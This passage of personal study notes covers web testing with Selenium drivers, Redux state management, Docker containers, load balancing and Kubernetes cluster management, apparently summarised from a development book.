    + real browser support headless mode 
    Chrome 
    Firefox 
    
    However, this will lose the performance benefit of running a headless browser.
    
- browser drivers, selenium webdriver 
    + Chrome and Chrome on Android uses the ChromeDriver (https://sites.google.com/a/chromium.org/chromedriver/)
    
    + Firefox uses the geckodriver (https://github.com/mozilla/geckodriver/)
    
    + Edge uses Microsoft WebDriver (https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/)
    
    + Safari uses SafariDriver (https://webkit.org/blog/6900/webdriver-support-in-safari-10/) 
    
    + iOS (native, hybrid, or mobile web application) uses ios-driver (http://ios-driver.github.io/ios-driver/)
    
    + Android(native, hybrid, mobile web) uses Selendriod 
    
    + headless browsers 
    HtmlUnit uses HtmlUnitDriver (https://github.com/SeleniumHQ/htmlunit-driver)
    PhantomJS uses GhostDriver (https://github.com/detro/ghostdriver
    
- implement tests,  The API of all classes and methods from selenium-webdriver can be found at https://seleniumhq.github.io/selenium/docs/api/javascript/module/selenium-webdriver/.

- adding multiple testing browsers, we'd be better off using Puppeteer. So, let's add Firefox to our tests.

Firefox's driver is geckodriver, which uses the Marionette proxy to send instructions to Firefox (Marionette is similar to Chrome's DevTools Protocol):


## Managing States with Redux 
- concepts in Redux
store 
reducers 
actions 
dispatchers 

- you'd define a set of reducer functions, each responding to different types of actions. The purpose of a reducer is to generate a new state object that’ll replace the last one. Updating the state no longer requires calling 20 different onChange functions. 

- MobX, incorporates functional reactive programming principles, and uses observables as its stores

- both  Redux and MobX work well with React.

- Redux DevTools (https://github.com/reduxjs/redux-devtools) as it'll make debugging with Redux much easier.
reducer 

initialState 

enhancer, a function that takes in the current store and modifies it to create a new 


# Section 4, Infrastructure and automation 
## Migrate to docker 
- control groups, separate processes by groups 
- PID, process IDs 
Parent PID namespace 
    child PID namespace 
    
- Docker, CoreOS, and other leaders in the container industry established the Open Container Initiative (OCI: opencontainers.org)

- it is not replacing LXC. Rather, it is providing a standard way to define, build, and run LXCs using Dockerfile
    + Image Specification (image-spec: github.com/opencontainers/image-spec)
    
    + Runtime Specification (runtime-spec: github.com/opencontainers/runtime-spec) 
    
    + runC (github.com/opencontainers/runc), to the OCI.
    
- A VM is an emulated computer system that runs on top of another computer system. It does this via a hypervisor—a program that has access to the physical hardware and manages the distribution and separation of resources between different VMs.

Hypervisors can be embedded in the system hardware and runs directly on it, at which point they are known as Type 1 hypervisors, that is, native, bare-metal, or embedded hypervisors. 

They may also run on top of the host’s operating system, at which point they are known as Type 2 hypervisors.

- containers versus vm 
    + Processes which run inside a container are isolated by namespaces and control group. Processes running inside a VM are separated by the emulated hardware.
    
    + container run directly on the host's kernel 
    
- we can use the 127.0.0.0/8 loopback addresses. Anything sent to the loopback address is sent back to the sender;

we can use 127.0.0.1 to refer to our own machine.

    + private IP addresses 
10.0.0.0 - 10.255.255.255 (10/8 prefix)
172.16.0.0 - 172.31.255.255 (172.16/12 prefix)
192.168.0.0 - 192.168.255.255 (192.168/16 prefix)

0.0.0.0 is a special address, which includes both your local loopback addresses and the IP address of your private network. 

Therefore, when we bind 0.0.0.0:9200 to the container’s port, 9200, we are forwarding any request coming into our local machine on port 9200 to the container.

- dockerizing backend API 
- shell versus exec forms 

there are two ways to specify the command to run:
 
    + shell form; RUN yarn run build: The command is run inside a new shell process, which, by default, is /bin/sh -c on Linux and cmd /S /C on Windows
    
    + exec form; RUN ["yarn", "run", "build"]: The command is not run inside a new shell process

- allowing unix signaling 
standard 
slim 
stretch 
alpine 

- docker team provide a tool called Docker Bench for Security 
https://github.com/docker/docker-bench-security

- Kubernetes allows us to create distributed clusters of redundant containers, each deployed on a different server, so that when one server fails, the containers deployed on the other servers will still keep the whole application running

- Deploying on a single server introduces a single point of failure (SPOF), which reduces the reliability of our application.

- manage distribution and redundant cluster 

    + service discovery tools 
    + global configuration store 
    + network tools 
    + scheduling tools 
    + load balancers 
    
- industry standard, cloud service provide 99.95% to 99.99% uptime 

this translates to a maximum downtime of between 52.6 minutes and 8.77 hours per year. Therefore, we should also aim to provide a similar level of availability for our API.

- eliminating single points of failure 
- load balancing versus failover 

Failover: Requests are routed to a single primary instance. If and when the primary instance fails, subsequent requests are routed to a different secondary, or standby, instance:

using a distributed load balancer makes more sense as it allows us to fully utilize all resources and provide better performance.

- Load balancing 
    + DNS for load distribution 
    
    A domain can configure its DNS settings so that multiple IP addresses are associated with it. When a client tries to resolve the domain name to an IP address, it returns a list of all IP addresses. Most clients would then send its requests to the first IP address in the list.
    
    major disadvantages:
        1. Lack of health-checks: The DNS does not monitor the health of the servers. 
        
        2. DNS cache their records, requests may still be routed to failed server 
        
        3. DNS propagating is slow 
        
    + employing a layer 4 or layer 7 balancer
    
Open Systems Interconnection (OSI) reference model:
----
|7 application layer 
|6 presentation layer 
|5 session layer 
|4 transport layer 
|3 network layer 
|2 data link layer 
|1 physical layer 
---

    + For example, FTP and MQTT are both application layer protocols. FTP is designed for file transfer, whereas MQTT is designed for publish-subscribe-based messaging.

    + L4 load balancer routes requests based on the source/destination IP addresses and ports, with zero regards to the contents of the packets.

    + An L7 load balancer can use information from the URL, HTTP headers (for example, Content-Type), cookies, contents of the message body
    
    L7 will consume more resource than L4 but can be more smarter as it could get more information from applications 
    
    HAProxy, NGINX, and Envoy 
    
- High reliability 
Mean time between failures (MTBF) uptime/number of failures 

Mean time to repair (MTTR)

- High throughput depends on several factors 
    + network latency 
    + performance 
    + parallelism 
    
improve throughput by 
    1. geographically close to client and reduce network latency 
    2. ensure servers have sufficient resources 
    3. deploy multiple instances of an application behind load balancer 
    4. ensure application code is non-blocking 
    
- high scalability
    + vertical, increase amount of resource CPU memory 
    + horizontally, adding servers 

- clusters and microservices 
    + resilient/durable, able to sustain component failures 
    + elastic, each service and resource can grow and shrink quickly based on demand 
    
    + hardware, cross multiple physical hosts 
    + software, deploy multiple instances of our services 
    route users to the quick response time 
    put one service offline and do some operations and then make it online 
    
    implemented as a Redundant Array Of Inexpensive Servers (RAIS), the server equivalent of RAID
    
- cluster management 
    + cluster level tools 
    a scheduler 
    discovery services 
    a global configuration store, (https://github.com/kelseyhightower/confd) is the most popular tool.
    
    + node level tools 
    local configuration management tools 
    container runtime 

the discovery service works like a register service 

host register app A -> discovery service -> host 2 request where app A 

    + Popular service discovery tools include the following:
    etcd, by CoreOS (https://github.com/coreos/etcd)Consul, 
    by HashiCorp (https://www.consul.io/)Zookeeper, 
    by Yahoo, now an Apache Software Foundation (https://zookeeper.apache.org/)
    
- scheduler, host selection is done by scheduler. 
Scheduler interface -> scheduler <-> distributed information store 
                         |
                schedule App F on host 2         
                         |
                         V 
        App A   |  App B    ... 
        host 1          host 2        
        
scheduler's decision can be based on a set of rules, called policies 

host density
service (anti-) affinity 
resource requirements 
hardware/software constraints 
other policies/rules set 

- provisioning tools 
    + Infrastructure Management tools like Terraform 
    + Configuration management tools, Puppet, Chef, Ansible or Salt 

    + Cluster management tools 
Marathon (https://mesosphere.github.io/marathon/): By Mesosphere and runs on Apache Mesos.

Swarm (https://docs.docker.com/engine/swarm/): The Docker engine includes a swarm mode that manages Docker containers in clusters called swarms.

Kubernetes, the de facto cluster management tool. become standard 

- Control planes and components, In Kubernetes terminology, a "component" is a process that implements some part of the Kubernetes cluster system; examples include the kube-apiserver and kube-scheduler. The sum of all components forms what you think of as the "Kubernetes system", which is formally known as the Control Plane.

- Container runtime, Open Container Initiative (OCI)'s runtime specification (https://github.com/opencontainers/runtime-spec). 

- Installing Minikube, Minikube is a free and open source tool by the Kubernetes team that enables you to easily run a single-node Kubernetes cluster locally. Without Minikube, you'd have to install and configure kubectl and kubeadm (used for provisioning) yourself.

t https://github.com/kubernetes/minikube/releases. For Ubuntu, we can choose to either run the install script or install the .deb package.

- Creating our first Pod 
    + lifecycle 
    + context, a pod is isolated from other pods similar to how one docker container is isolated from other 
    + shared network 
    + shared storage 

- Configuring Elasticsearch's Zen Discovery, Elasticsearch provides a discovery module, called Zen Discovery, that allows different Elasticsearch nodes to find each other.

- Official Elasticsearch Guide (https://www.elastic.co/guide/en/elasticsearch/reference/current/docker.html#_notes_for_production_use_and_defaults)

- Using pssh, Tools such as pssh (parallel ssh, https://github.com/robinbowes/pssh), pdsh (https://github.com/chaos/pdsh), or clusterssh (https://github.com/duncs/clusterssh) allow you to issue commands simultaneously to multiple servers at once. 

- Kubernetes provides the PersistentVolume (PV) object. PersistentVolume is a variation of the Volume Object, but the storage capability is associated with the entire cluster

- Using the csi-digitalocean provisioner 
DigitalOcean provides its own provisioner called CSI-DigitalOcean (https://github.com/digitalocean/csi-digitalocean

Web UI Dashboard should be available at http://localhost:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/

- docker hub, Docker Hub via the URL hub.docker.com/r/<namespace>/<repository-name>/.

- The most popular Ingress controller is the NGINX controller (https://github.com/kubernetes/ingress-nginx), which is officially supported by Kubernetes and NGINX. Deploy it by running kubectl apply